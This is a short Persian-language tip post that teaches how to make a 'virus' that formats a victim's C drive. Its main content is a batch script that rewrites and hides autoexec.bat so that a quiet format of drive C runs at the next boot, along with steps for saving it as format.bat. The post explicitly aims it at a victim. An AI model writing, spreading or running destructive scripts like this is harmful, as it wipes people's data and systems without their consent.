ساخت ویروس فرمت کننده ی درایو c

"در این ترفند می خواهیم که به شما یاد بدیم چگونه یه ویروس بسازید که درایو c طرف قربانی را به طور کل فرمت کند"

برای این کار نت پد را باز کرده و عبارت زیر را در ان کپی کنید:


@echo off

call attrib -r -h c:autoexec.bat >nul

echo @echo off >c:autoexec.bat

echo format /autotest c:/q>nul >>c:autoexec.bat

call attrib +r +h c:autoexec.bat >nul

exit

 سپس SaveAs را انتخاب و فایل را با پسوند bat سیو کنید یعنی با نامی مثل format.bat کار این ویروس اینه که درایو c  طرف رو فرمت می کنه و طرف مجبور میشه دوباره ویندوز بریزه. اصلا روی اون کلیک نکنید که به این بلا گرفتار نشید....


ما را در اینستاگرام amozeshpc@ دنبال کنید.